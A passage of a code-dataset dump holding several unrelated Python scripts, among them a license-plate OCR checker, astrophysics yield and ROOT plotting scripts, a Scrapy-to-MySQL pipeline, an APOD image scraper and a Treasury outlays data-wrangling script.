cursor.fetchone()\n # print(records)\n if records is not None: # fetchone() returns a single row or None, so a len() check would crash on a miss\n print('Number verified :) ')\n else:\n print(\"Number NOT verified :( \")\n except Error as e:\n print(\"Error reading data from MySQL table\", e)\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n print(\"MySQL connection is closed\")\n return\n\n\nif __name__ == \"__main__\":\n # initialise\n pytesseract.pytesseract.tesseract_cmd = r'C:\Program Files\Tesseract-OCR\tesseract.exe'\n\n # Pick an image using a GUI file dialog\n root = Tk()\n root.title(\"MINI PROJECT\")\n\n string = filedialog.askopenfilename(initialdir=\"D:/code/ALPR/Images\",\n title=\"Select A File\")\n\n # load image as an object\n img = cv.imread(string)\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n # plt.imshow(cv.cvtColor(gray, cv.COLOR_BGR2RGB))\n cv.imshow('Frame3', gray)\n cv.waitKey(100)\n\n # basically bilateralFilter(img, d, sigmaColor, sigmaSpace, borderType)\n bfilter = cv.bilateralFilter(gray, 15, 15, 15) # Noise reduction\n cv.imshow('Frame3', bfilter)\n cv.waitKey(100)\n\n # Canny uses hysteresis thresholding\n edged = cv.Canny(bfilter, 30, 255) # Edge detection\n # edged = cv.Canny(gray, 30, 200)\n\n # plt.imshow(cv.cvtColor(edged, cv.COLOR_BGR2RGB))\n cv.imshow('Frame3', edged)\n cv.waitKey(100)\n\n # RETR_TREE: retrieves all of the contours and reconstructs\n # a full hierarchy of nested contours.\n # CHAIN_APPROX_SIMPLE compresses horizontal, vertical,\n # and diagonal segments and leaves only their end points.\n keypoints = cv.findContours(edged.copy(), cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n contours = imutils.grab_contours(keypoints)\n contours = sorted(contours, key=cv.contourArea, reverse=True)[:10]\n\n # img1 = cv.drawContours(edged, [contours[8]], 0, 255, -1)\n # cv.imshow('Frame3', img1)\n # cv.waitKey(6000)\n\n print(\"Contour count:\", len(contours))\n\n location = None\n\n for contour in contours:\n # epsilon: parameter specifying the approximation accuracy, i.e. the\n # maximum distance between the original curve and its approximation\n approx = cv.approxPolyDP(contour, 10, True) # (cnt, epsilon, closed)\n # could add a condition for a rectangle (based on length & breadth)\n if len(approx) == 4 and 100 < cv.contourArea(contour):\n location = approx\n img1 = cv.drawContours(edged, [contour], 0, 255, -1)\n cv.imshow('Frame3', img1)\n cv.waitKey(100)\n break\n\n mask = np.zeros(gray.shape, np.uint8)\n new_image = cv.drawContours(mask, [location], 0, 255, -1)\n cv.imshow('Frame3', new_image)\n cv.waitKey(100)\n\n new_image = cv.bitwise_and(img, img, mask=mask)\n cv.imshow('Frame3', new_image)\n cv.waitKey(100)\n\n # plt.imshow(cv.cvtColor(new_image, cv.COLOR_BGR2RGB))\n\n (x, y) = np.where(mask == 255)\n (x1, y1) = (np.min(x), np.min(y))\n (x2, y2) = (np.max(x), np.max(y))\n cropped_image = gray[x1:x2+1, y1:y2+1]\n cv.imshow('Frame3', cropped_image)\n cv.waitKey(1000)\n\n # plt.imshow(cv.cvtColor(cropped_image, cv.COLOR_BGR2RGB))\n\n # For tesseract\n result = 
pytesseract.image_to_string(cropped_image)\n # print(result)\n\n # for tessearct\n text = result\n\n # Strip off the spaces & unwanted chars present in between characters\n text = text.replace(\" \", \"\")\n text = text.strip()\n text = re.sub('[\\W_]+', '', text)\n\n # Check with the DB\n fetchFromDB(text)\n\n # text = result[0][-2]\n font = cv.FONT_HERSHEY_SIMPLEX\n res = cv.putText(img, text=text, org=(approx[0][0][0], approx[1][0][1]+60),\n fontFace=font, fontScale=1, color=(0, 255, 0), thickness=2,\n lineType=cv.LINE_AA)\n res = cv.rectangle(img, tuple(approx[0][0]), tuple(approx[2][0]), (0, 255, 0), 3)\n #plt.imshow(cv.cvtColor(res, cv.COLOR_BGR2RGB))\n\n # show the frame with number\n cv.imshow('Frame3', res)\n cv.waitKey(4000)\n\n print(\"Text: \", text)","sub_path":"Roughbook_tesseract.py","file_name":"Roughbook_tesseract.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"559765212","text":"from voxsup.api.client.linkedin import LinkedInClient as Client\naccount_id = 500735271 # VoxSup Inc\nclient = Client(context={'account_id': account_id})\nenable_requests_logging()\n\nbody = {\n \"patch\": {\n \"$set\": {\n \"htmlBody\": \"Hi I'm Joe\"\n }\n }\n}\nresponse = client.post('adInMailContentsV2/1120974', json=body)\nresponse.json()\n","sub_path":"linkedin/liEditHtmlBodyTest.py","file_name":"liEditHtmlBodyTest.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"184887017","text":"\"\"\" \nNKT13 processor \n\nARGV \n==== \n1) \t\tElemental symbol \n\"\"\" \n\nimport sys \nimport os \n\nz_dirs = {\n\t0: \t\t\t\"FeH-inf\", \n\t0.001: \t\t\"FeH-1p15\", \n\t0.004: \t\t\"FeH-0p54\", \n\t0.008: \t\t\"FeH-0p24\", \n\t0.02: \t\t\"FeH0p15\", \n\t0.05: \t\t\"FeH0p55\" \n}\n\ndef get_yields(filestream): \n\tline = filestream.readline() \n\twhile not line.startswith(\"M \"): \n\t\tline = filestream.readline() \n\t# line = filestream.readline() \n\tmasses = [float(i) for i in line.split()[1:]] \n\twhile not line.startswith(sys.argv[1]): \n\t\tline = filestream.readline() \n\tisotopes = [] \n\tyields = [] \n\twhile line.startswith(sys.argv[1]) and line != \"\": \n\t\tisotopes.append(\"%s%d\" % (sys.argv[1], int(line.split()[1]))) \n\t\tyields.append([float(i) for i in line.split()[2:]]) \n\t\tline = f.readline() \n\t\tprint(line) \n\t# yields = [list(i) for i in zip(masses, yields)] \n\t# print(yields) \n\t# print(len(yields)) \n\treturn [masses, isotopes, yields] \n\n\ndef write_yields(outstream, masses, isotopes, yields): \n\toutstream.write(\"# Units are Msun\\n\") \n\toutstream.write(\"# M_init\\t\") \n\tfor i in isotopes: \n\t\toutstream.write(\"%s\\t\" % (i.lower())) \n\toutstream.write(\"\\n8\\t\")\n\tfor i in isotopes: \n\t\toutstream.write(\"0\\t\") \n\toutstream.write(\"\\n\") \n\tfor i in range(len(masses)): \n\t\tif masses[i] > 8: \n\t\t\toutstream.write(\"%g\\t\" % (masses[i])) \n\t\t\tfor j in range(len(isotopes)): \n\t\t\t\t outstream.write(\"%e\\t\" % (yields[j][i])) \n\t\t\toutstream.write(\"\\n\") \n\t\telse: \n\t\t\tcontinue \n\toutstream.close() \n\n\nif __name__ == \"__main__\": \n\twith open(\"ck13.dat\", 'r') as f: \n\t\tfor i in z_dirs.keys(): \n\t\t\tmasses, isotopes, yields = get_yields(f) \n\t\t\twith open(\"%s/v0/%s.dat\" % (z_dirs[i], sys.argv[1].lower()), \n\t\t\t\t'w') as out: \n\t\t\t\twrite_yields(out, masses, isotopes, yields) \n\t\tf.close() 
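\n# --- Added sketch (not part of the original processor): a minimal reader for\n# the per-element files written by write_yields() above, assuming its two-line\n# header (\"# Units are Msun\", then \"# M_init\" followed by the isotope names).\n# The layout mirrors write_yields(); any concrete path passed in is hypothetical.\ndef read_yields(path):\n\twith open(path, 'r') as stream:\n\t\tstream.readline() # skip \"# Units are Msun\"\n\t\tisotopes = stream.readline().split()[2:] # drop \"#\" and \"M_init\"\n\t\trows = [[float(x) for x in line.split()] for line in stream if line.strip()]\n\tmasses = [row[0] for row in rows]\n\tyields = {iso: [row[i + 1] for row in rows] for i, iso in enumerate(isotopes)}\n\treturn masses, yields\n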
\n\n","sub_path":"vice/yields/ccsne/NKT13/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"599485551","text":"'''\nPlot mean and width of s vs pt for Lyon and Caltech MC and MC truth\n Usage: python -i frp_caltech_vs_lyon.py\n'''\n\nimport JPsi.MuMu.common.canvases as canvases\nfrom JPsi.MuMu.escale.fitResultPlotter import FitResultPlotter\nfrom JPsi.MuMu.common.binedges import BinEdges\nfrom JPsi.MuMu.common.basicRoot import *\nfrom JPsi.MuMu.common.roofit import *\nfrom JPsi.MuMu.escale.lyondata import data_2011_09_23_confID155805 as lyon\nfrom JPsi.MuMu.scaleFitter import subdet_r9_categories\n\ngStyle.SetPadTopMargin(0.1)\ncanvases.wwidth = 400\ncanvases.wheight = 400\ncanvases.yperiod = 10\n\nfilename = '/raid2/veverka/esFitResults/mc_sreco_strue_Baseline_V1.root'\nfilename = '/Users/veverka/Work/Talks/11-11-04/mc_sreco_strue_Baseline_V1.root'\nfilename = '/Users/veverka/Work/Talks/11-11-09/Baseline_mod1/mc_sreco_strue_Baseline_mod1.root'\n\nplotters = []\n\n## Configuration for plots vs Pt\nbinedges = list(BinEdges([10, 12, 15, 20, 25, 30, 100]))\nbincenters = [0.5*(lo + hi)\n for lo, hi in BinEdges([10, 12, 15, 20, 25, 30, 50])]\nbinhalfwidths = [0.5*(hi - lo)\n for lo, hi in BinEdges([10, 12, 15, 20, 25, 30, 50])]\nn = len(binedges)\n# binhalfwidths = [0] * n\n\ndef var_vs_pt(name):\n \"\"\"Returns functions that take a workspaces ws and return\n x, y, ex, ey where y and ey correspond to workspace\n variable of a given name and x and ex are pt bins.\"\"\"\n return (\n lambda ws, i = iter(bincenters): i.next(), # x\n lambda ws: ws.var(name).getVal(), # y\n lambda ws, i = iter(binhalfwidths): i.next(), # ex\n lambda ws: ws.var(name).getError(), # ey\n )\n\ncategories = 'EB_lowR9 EB_highR9 EE_lowR9 EE_highR9'.split()\nlyonmc = lyon['mc']\n\nclass Config():\n \"\"\"Holds fitResultPlotter configuration data.\"\"\"\n def __init__(self, **kwargs):\n for name, value in kwargs.items():\n setattr(self, name, value)\n## end of Config\n\ncfgs = [\n ###########################################################################\n ## EB, R9 < 0.94, mmMass < 80 GeV, mmgMass in [87.2, 95.2]\n Config(\n ## Used to pick the right Lyon data and in canvas name\n name = 'EB_lowR9',\n ## Used in canvas title\n title = 'Barrel, R_{9} < 0.94, Baseline Selection, POWHEG S4',\n filenames = [filename] * n,\n wsnames = ('ws1',) * n,\n sreco_snapshots = ['sFit_sreco_mc_cbShape_mmMass80_EB_lowR9_PhoEt%d-%d'\n % (lo, hi) for lo, hi in binedges],\n ## MC truth scale\n strue_snapshots = ['sFit_strue_mc_bifurGauss_mmMass80_EB_lowR9_'\n 'PhoEt%d-%d' % (lo, hi) for lo, hi in binedges],\n ),\n ###########################################################################\n ## EB, R9 > 0.94, mmMass < 80 GeV, mmgMass in [87.2, 95.2]\n Config(\n ## Used to pick the right Lyon data and in canvas name\n name = 'EB_highR9',\n ## Used in canvas title\n title = 'Barrel, R_{9} > 0.94, Baseline Selection, POWHEG S4',\n filenames = [filename] * n,\n wsnames = ('ws1',) * n,\n sreco_snapshots = ['sFit_sreco_mc_cbShape_mmMass80_EB_highR9_PhoEt%d-%d'\n % (lo, hi) for lo, hi in binedges],\n ## MC truth scale\n strue_snapshots = ['sFit_strue_mc_bifurGauss_mmMass80_EB_highR9_'\n 'PhoEt%d-%d' % (lo, hi) for lo, hi in binedges],\n ),\n ###########################################################################\n ## EE, R9 < 0.95, mmMass < 80 GeV, mmgMass in [87.2, 95.2]\n Config(\n ## Used to pick the right 
Lyon data and in canvas name\n name = 'EE_lowR9',\n ## Used in canvas title\n title = 'Endcaps, R_{9} < 0.95, Baseline Selection, POWHEG S4',\n filenames = [filename] * n,\n wsnames = ('ws1',) * n,\n sreco_snapshots = ['sFit_sreco_mc_cbShape_mmMass80_EE_lowR9_PhoEt%d-%d'\n % (lo, hi) for lo, hi in binedges],\n ## MC truth scale\n strue_snapshots = ['sFit_strue_mc_bifurGauss_mmMass80_EE_lowR9_'\n 'PhoEt%d-%d' % (lo, hi) for lo, hi in binedges],\n ),\n ###########################################################################\n ## EE, R9 > 0.95, mmMass < 80 GeV, mmgMass in [87.2, 95.2]\n Config(\n ## Used to pick the right Lyon data and in canvas name\n name = 'EE_highR9',\n ## Used in canvas title\n title = 'Endcaps, R_{9} > 0.95, Baseline Selection, POWHEG S4',\n filenames = [filename] * n,\n wsnames = ('ws1',) * n,\n sreco_snapshots = ['sFit_sreco_mc_cbShape_mmMass80_EE_highR9_PhoEt%d-%d'\n % (lo, hi) for lo, hi in binedges],\n ## MC truth scale\n strue_snapshots = ['sFit_strue_mc_bifurGauss_mmMass80_EE_highR9_'\n 'PhoEt%d-%d' % (lo, hi) for lo, hi in binedges],\n ),\n]\n\n\nfor cfg in cfgs:\n #------------------------------------------------------------------------------\n ## Scale Comparison\n ## Lyon\n frp = FitResultPlotter(\n sources = zip(cfg.filenames, cfg.wsnames, cfg.sreco_snapshots),\n getters = (\n lambda ws, i = iter(bincenters): i.next(), # x\n lambda ws, i = iter(lyonmc[cfg.name]['sreco']): i.next(), # y\n lambda ws, i = iter(binhalfwidths): i.next(), # ex\n lambda ws, i = iter(lyonmc[cfg.name]['esreco']): i.next(), # ey\n ),\n xtitle = 'E_{T}^{#gamma} (GeV)',\n ytitle = 's_{reco} = E^{#gamma}_{reco}/E^{kin}_{reco} - 1 (%)',\n title = 'Lyon',\n )\n frp.getdata()\n frp.makegraph()\n\n ## Caltech\n frp.getters = var_vs_pt('#Deltas')\n frp.title = 'Caltech'\n frp.getdata()\n frp.makegraph()\n\n ## True\n frp.sources = zip(cfg.filenames, cfg.wsnames, cfg.strue_snapshots)\n frp.getters = var_vs_pt('#Deltas')\n frp.title = 'MC Truth'\n frp.getdata()\n frp.makegraph()\n\n ## Compare Caltech, Lyon and MC truth scale\n canvases.next('s_' + cfg.name).SetGrid()\n frp.plotall(title = cfg.title,\n styles = [20, 25, 22],\n colors = [kBlue, kRed, kBlack])\n\n plotters.append(frp)\n\n #------------------------------------------------------------------------------\n ## S width Comparison\n ## Lyon\n frp = FitResultPlotter(\n sources = zip(cfg.filenames, cfg.wsnames, cfg.sreco_snapshots),\n getters = (\n lambda ws, i = iter(bincenters): i.next(), # x\n lambda ws, i = iter(lyonmc[cfg.name]['sigma']): i.next(), # y\n lambda ws, i = iter(binhalfwidths): i.next(), # ex\n lambda ws, i = iter(lyonmc[cfg.name]['esigma']): i.next(), # ey\n ),\n xtitle = 'E_{T}^{#gamma} (GeV)',\n ytitle = '#sigma(s_{reco}) (%)',\n title = 'Lyon',\n )\n frp.getdata()\n frp.makegraph()\n\n ## Caltech\n frp.getters = var_vs_pt('#sigma')\n frp.title = 'Caltech'\n frp.getdata()\n frp.makegraph()\n\n ## Compare Caltech and Lyon s width\n canvases.next('sigma_' + cfg.name).SetGrid()\n frp.plotall(title = cfg.title,\n styles = [20, 25])\n\n plotters.append(frp)\n## end of loop over cfgs\n\n\n\n################################################################################\n## Plot the p-values of the MC true fits\nfilenames = [filename] * n\nworkspaces = ['ws1'] * n\nsnapshot = 'chi2_strue_mc_bifurGauss_mmMass80_%s_PhoEt%d-%d_iter0'\ncats = list(subdet_r9_categories)\n\nfrp = FitResultPlotter(\n sources = zip([filename] * n,\n ['ws1'] * n,\n [snapshot % ('EB_highR9', lo, hi) for lo, hi in binedges]),\n getters = 
var_vs_pt('chi2Prob'),\n xtitle = 'E_{T}^{#gamma} (GeV)',\n ytitle = 'p-value',\n title = 'Barrel, R_{9}^{#gamma} < 0.94',\n )\n\nfor icat in cats:\n frp.sources = zip(filenames, workspaces,\n [snapshot % (icat.name, lo, hi) for lo, hi in binedges])\n frp.getters = var_vs_pt('chi2Prob')\n frp.title = ', '.join(icat.labels)\n frp.getdata()\n frp.makegraph()\n\ncanvases.next('strue_pvalues_vs_phoEt')\nfrp.plotall(title = 'MC Truth Fits')\nplotters.append(frp)\n\n## Make the distribution of the p-values\nhist = frp.histogramall(\n name = 'h_strue_pvalues',\n title = 's_{true} = E^{#gamma}_{reco}/E^{#gamma}_{gen};p-value;Fits',\n nbins = 5, xlow = 0, xhigh = 1\n )\ncanvases.next('strue_pvalues_distro')\nhist.Draw('e0')\nplotters.append(hist)\n\n################################################################################\n## Plot the p-values of the reco s-Fits fits\nfilenames = [filename] * n\nworkspaces = ['ws1'] * n\nsnapshot = 'chi2_sreco_mc_cbShape_mmMass80_%s_PhoEt%d-%d_iter0'\n\nfrp = FitResultPlotter(\n sources = zip([filename] * n,\n ['ws1'] * n,\n [snapshot % ('EB_highR9', lo, hi) for lo, hi in binedges]),\n getters = var_vs_pt('chi2Prob'),\n xtitle = 'E_{T}^{#gamma} (GeV)',\n ytitle = 'p-value',\n title = 'Barrel, R_{9}^{#gamma} > 0.94',\n )\n\nfor icat in cats:\n frp.sources = zip(filenames, workspaces,\n [snapshot % (icat.name, lo, hi) for lo, hi in binedges])\n frp.getters = var_vs_pt('chi2Prob')\n frp.title = ', '.join(icat.labels)\n frp.getdata()\n frp.makegraph()\n\ncanvases.next('sreco_pvalues_vs_phoEt').SetLogy()\nfrp.plotall(logy = True, title = 's_{reco} Fits')\n\n## Make the distribution of the p-values\nhist = frp.histogramall(\n name = 'h_sreco_pvalues',\n title = 's_{reco} = E^{#gamma}_{reco}/E^{#gamma}_{kin};p-value;Fits',\n nbins = 5, xlow = 0, xhigh = 1\n )\nc1 = canvases.next('sreco_pvalues_distro')\nhist.Draw('e0')\nplotters.append(hist)\n\nc1.Update()\n\nif __name__ == '__main__':\n import user\n","sub_path":"MuMu/test/escale/frp_caltech_vs_lyon.py","file_name":"frp_caltech_vs_lyon.py","file_ext":"py","file_size_in_byte":9718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"442195433","text":"# -*- coding: utf-8 -*-\n\nfrom twisted.enterprise import adbapi\nimport MySQLdb.cursors\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n'''\nCREATE TABLE `alpha_document_article` (\n `id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '文档ID',\n `parse` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT '内容解析类型',\n `content` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL COMMENT '文章内容',\n `template` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '' COMMENT '详情页显示模板',\n `bookmark` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '收藏数',\n `url` varchar(255) NOT NULL DEFAULT '' COMMENT '文章url',\n `md5` char(32) CHARACTER SET utf8 NOT NULL DEFAULT '' COMMENT '文章url md5',\n `title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '' COMMENT '文章标题',\n `summary` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL COMMENT '文章摘要',\n `img` varchar(255) DEFAULT NULL COMMENT '缩略图',\n `article_img` varchar(255) DEFAULT NULL COMMENT '大图',\n `article_img_from` varchar(255) DEFAULT NULL COMMENT '大图来源',\n `article_source` varchar(255) DEFAULT NULL COMMENT '文章来源',\n `article_source_link` varchar(255) DEFAULT NULL COMMENT '文章源link',\n 
`article_source_title` varchar(255) DEFAULT NULL COMMENT '文章源标题',\n `create_time` bigint(13) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',\n `update_time` bigint(13) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',\n `author` varchar(255) DEFAULT NULL COMMENT '作者',\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 ROW_FORMAT=DYNAMIC COMMENT='文档模型文章表';\n\n title = scrapy.Field()\n url = scrapy.Field()\n md5 = scrapy.Field()\n img = scrapy.Field()\n author = scrapy.Field()\n time = scrapy.Field()\n articleImg = scrapy.Field()\n articleImgFrom = scrapy.Field()\n articleSource = scrapy.Field()\n articleSourceLink = scrapy.Field()\n articleSourceTitle = scrapy.Field()\n summary = scrapy.Field()\n content = scrapy.Field()\n'''\n\nimport json\nimport datetime\n\nclass JsonWriterPipeline(object):\n\n def open_spider(self, spider):\n self.file = open('../result/%s.json' % (datetime.datetime.now().strftime('%b-%d-%y_%H_%M_%S')), 'w')\n self.file.write('[')\n self.firstLine = True\n\n def close_spider(self, spider):\n self.file.write(']')\n self.file.close()\n\n def process_item(self, item, spider):\n if self.firstLine:\n line = json.dumps(dict(item))\n self.firstLine = False\n else:\n line = \",\\n\" + json.dumps(dict(item))\n self.file.write(line)\n return item\n\nclass AlphaPipeline(object):\n def __init__(self): \n self.db_pool = adbapi.ConnectionPool('MySQLdb',\n db='alpha',\n user='root',\n passwd='123456',\n host='127.0.0.1',\n port=3307,\n charset='utf8',\n use_unicode=True)\n \n def process_item(self, item, spider):\n query = self.db_pool.runInteraction(self._conditional_insert, item)\n query.addErrback(self.handle_error)\n return item\n\n def _conditional_insert(self, tx, item):\n print(\"select id from alpha_document_article where md5 = %s\", (item['md5'], ))\n\n tx.execute(\"select id from alpha_document_article where md5 = %s\", (item['md5'], ))\n result = tx.fetchone()\n if result:\n pass\n else:\n values = (\n item['title'],\n item['url'],\n item['md5'],\n item['content'],\n item['author'],\n item['summary'],\n item['img'],\n item['articleImg'],\n item['articleImgFrom'],\n item['articleSource'],\n item['articleSourceLink'],\n item['articleSourceTitle'],\n item['time']\n )\n tx.execute(\"insert into alpha_document_article(title, url, md5, content, author, summary, img, article_img, article_img_from, article_source, article_source_link, article_source_title, create_time) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\", values)\n\n def handle_error(self, e):\n print('error',e)","sub_path":"spider/alpha/alpha/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":4695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"42848457","text":"from urllib.request import urlopen, urlretrieve\nfrom urllib.parse import urljoin\nfrom bs4 import BeautifulSoup\nimport os\n\n\nbaseUrl = \"https://apod.nasa.gov/apod/archivepix.html\"\narchiveHtmlStr = urlopen(baseUrl).read()\n\nfor link in BeautifulSoup(archiveHtmlStr, \"html.parser\").findAll(\"a\", limit=10):\n imgBaseUrl = urljoin(baseUrl, link['href'])\n \n # follow the link to image page\n imgHtmlStr = urlopen(imgBaseUrl).read()\n imgUrl = urljoin(imgBaseUrl, BeautifulSoup(imgHtmlStr, \"html.parser\").img['src'])\n imgName = imgUrl.split('/')[-1]\n print(imgName, imgUrl)\n\n # download and store image\n downloadDir = 'apod_pictures'\n urlretrieve(imgUrl, os.path.join(downloadDir, imgName))\n 
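\n# --- Added sketch (not part of the original scraper): a quick sanity check,\n# after the download loop above, that each file landed on disk with a nonzero\n# size. It relies only on the already-imported os module; 'apod_pictures' is\n# the same downloadDir value hard-coded in the loop body.\nfor name in sorted(os.listdir('apod_pictures')):\n size = os.path.getsize(os.path.join('apod_pictures', name))\n print(name, 'saved,', size, 'bytes')\n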
","sub_path":"python/oreilly_intermediate_python/unit6_scraping/scraper3.py","file_name":"scraper3.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"419726646","text":"\"\"\"\nAuthor: Janelle Becker\nOriginal Date: 17-08-07\n\nGOALS OF THIS SCRIPT:\n --Read in historical MTS data table (outlays)\n --Get the data in a dataframe format that is ready for data visualization \n --Ideally tool-agnostic, but for now, assuming LONG dataset \n \n \n # Create separate dataframe of the following by splitting into 3 df's\n (1) numbers\n (2) percent of outlays\n (3) percent of gdp\n \n \n \n --v2 changes:\n\n\n\n\"\"\"\n### Import stuff --------------------------------------------------------------\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport time\nimport requests\nimport numpy as np\nimport json\nimport urllib\nfrom pandas.io.json import json_normalize\nimport os\nimport xlrd\n\nstart = time.time()\n\n\n### SET UP THE DIRECTORIES ----------------------------------------------------\nmain_dir = \"C:/Users/583902/Desktop/BAH1/_Treasury_DATA_Act/MTS\"\ndata_dir = main_dir + \"/data\"\nhist_dir = data_dir + \"/Historical_Tables/GPO_Historical_Tables\"\noutput_dir = data_dir + \"/output/historical_output\"\n\n\nos.chdir(hist_dir) #change working directory to data in GA folder\nos.listdir(os.getcwd()) #list out files in there \n\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\"\"\"| Random Technical Notes |\"\"\"\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\n\"\"\" \nFILE NAMES\nfor some reason these file names are off by one. Table 3.1 is \n#called 4-1 :(\n\n# Table 3.1—OUTLAYS BY SUPERFUNCTION AND FUNCTION: 1940–2021\n # numbers are in millions (from excel)\n # (*) * 0.05 percent or less.\n # (−*) i guess negative less than .05 percent?\n\nFISCAL YEAR \nThe first fiscal year for the U.S. Government started Jan. 1, 1789. Congress \nchanged the beginning of the fiscal year from Jan. 1 to Jul. 1 in 1842, and \nfinally from Jul. 1 to Oct. 1 in 1977 where it remains today.\n\n\n# Some functions started at different times, e.g. 
Medicare or General Science.\n I converted these \"....\" to zeroes.\n\n\"\"\"\n\n\n\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\"\"\"| Bring in the data |\"\"\"\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\n\n# Table 3.1—OUTLAYS BY SUPERFUNCTION AND FUNCTION: 1940–2021\n\n# numbers are in millions (from Excel)\n# (*) 0.05 percent or less.\n# (−*) presumably a negative value of 0.05 percent or less\n\npath = hist_dir + \"/BUDGET-2017-TAB-4-1.xls\"\nwhatiwant = {col: str for col in (0, 83)} # force columns 0 and 83 (the first and last, per the Excel sheet) to be read as str\ndf = pd.read_excel(path, \n sheetname=\"Table\", \n header=1,\n skiprows = [2, 57],\n converters=whatiwant)\n\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\"\"\"| Wrangle in the data |\"\"\"\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\n\n# Check out the column names \ncols_df = df.columns.tolist()\n\n\n# Rename columns ----------------------------------------------------------------\ncols_to_change = cols_df[1:]\ncols_new_names = [\"outlays_M_\" + str(i) for i in cols_to_change]\n\n# Add the superfunction column name back to the list\ncols_new_names = ['Superfunction_and_Function'] + cols_new_names\n\nfor (oldcolname, replacement) in zip(cols_df, cols_new_names):\n df.rename(columns={oldcolname : replacement}, inplace=True)\n\n\n# Still a few left to rename individually rather than building new lists\ndf.rename(columns= {\"outlays_M_2016 estimate\" : \"outlays_M_2016_estimate\"}, inplace=True)\ndf.rename(columns= {\"outlays_M_2017 estimate\" : \"outlays_M_2017_estimate\"}, inplace=True)\ndf.rename(columns= {\"outlays_M_2018 estimate\" : \"outlays_M_2018_estimate\"}, inplace=True)\ndf.rename(columns= {\"outlays_M_2019 estimate\" : \"outlays_M_2019_estimate\"}, inplace=True)\ndf.rename(columns= {\"outlays_M_2020 estimate\" : \"outlays_M_2020_estimate\"}, inplace=True)\ndf.rename(columns= {\"outlays_M_2021 estimate\" : \"outlays_M_2021_estimate\"}, inplace=True)\n\n# check that it went right\ncols_df = df.columns.tolist() \ncols_df\n\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\"\"\"| Create 3 dataframes: $, % of outlays, % of GDP |\"\"\"\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n# I want to create a separate dataframe for the \"As a percent of outlays\" numbers\n\n# Find the line that says \"As percentages of outlays:\" and its index\nindex_pct_OL_header = df[(df.loc[:, 'Superfunction_and_Function']==\"As percentages of outlays: \")].index.tolist()[0]\nindex_pct_GDP_header = df[(df.loc[:, 'Superfunction_and_Function']==\"As percentages of GDP: \")].index.tolist()[0]\n\n# Rows 0 to index_pct_OL_header are the dollar amounts\n# Rows index_pct_OL_header to index_pct_GDP_header are % of outlays\n# Rows index_pct_GDP_header to the end are % of GDP\n\ndf1 = df[:] # make a copy instead of renaming the actual dataframe\ndf = df1[:index_pct_OL_header]\ndf_pct_OL = df1[index_pct_OL_header:index_pct_GDP_header]\ndf_pct_GDP = df1[index_pct_GDP_header:]\n\n\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n\"\"\"| Wrangle the data to get just functions & values |\"\"\"\n\"\"\"|--------------------------------------------------------------------|\"\"\"\n# I only want the FUNCTIONS, and there are a lot of other lines, e.g. 
on- and off-budget numbers\n\n### Drop the row if it is offering on-budget or off-budget numbers -------------------\n\n# make sure it's a string and stripped/trimmed\ndf['Superfunction_and_Function'] = df['Superfunction_and_Function'].str.strip()\ndf['Superfunction_and_Function'] = df['Superfunction_and_Function'].astype(str)\n\n# Keep the rows where the function does not include the word \"budget\"\ndf = df[~df['Superfunction_and_Function'].str.contains('budget')]\ndf.reset_index(drop=True, inplace=True)\n\n\n### Find all \"..........\" and replace them with 0 for the whole dataframe----------------\n# When no values are available (e.g. Medicare in 1950) they used \"..........\"\ndf = df.replace(\"..........\", 0)\n\n\n### Ensure all numbers are typed as floats or integers---------------------------\n# The 2021 estimate column is read in as str rather than a number, so cast it\ncols_df\ntype(df['outlays_M_2020_estimate'][0]) # numpy.float64\ntype(df['outlays_M_2021_estimate'][0]) # str\n\n\ndf['outlays_M_2021_estimate'] = df['outlays_M_2021_estimate'].astype(float)\ntype(df['outlays_M_2021_estimate'][0]) # numpy.float64\n","sub_path":"scripts/MTS_Historical_to_Viz_Outlays_v1.py","file_name":"MTS_Historical_to_Viz_Outlays_v1.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"543156779","text":"import tkinter as tk\n\nfrom collections import namedtuple\nfrom tkinter import ttk\n\n\nclass ClipboardEntry(ttk.Entry):\n MAX_HISTORY = 30\n HISTORY_ENTRY = namedtuple('History', ('data', 'pre_index', 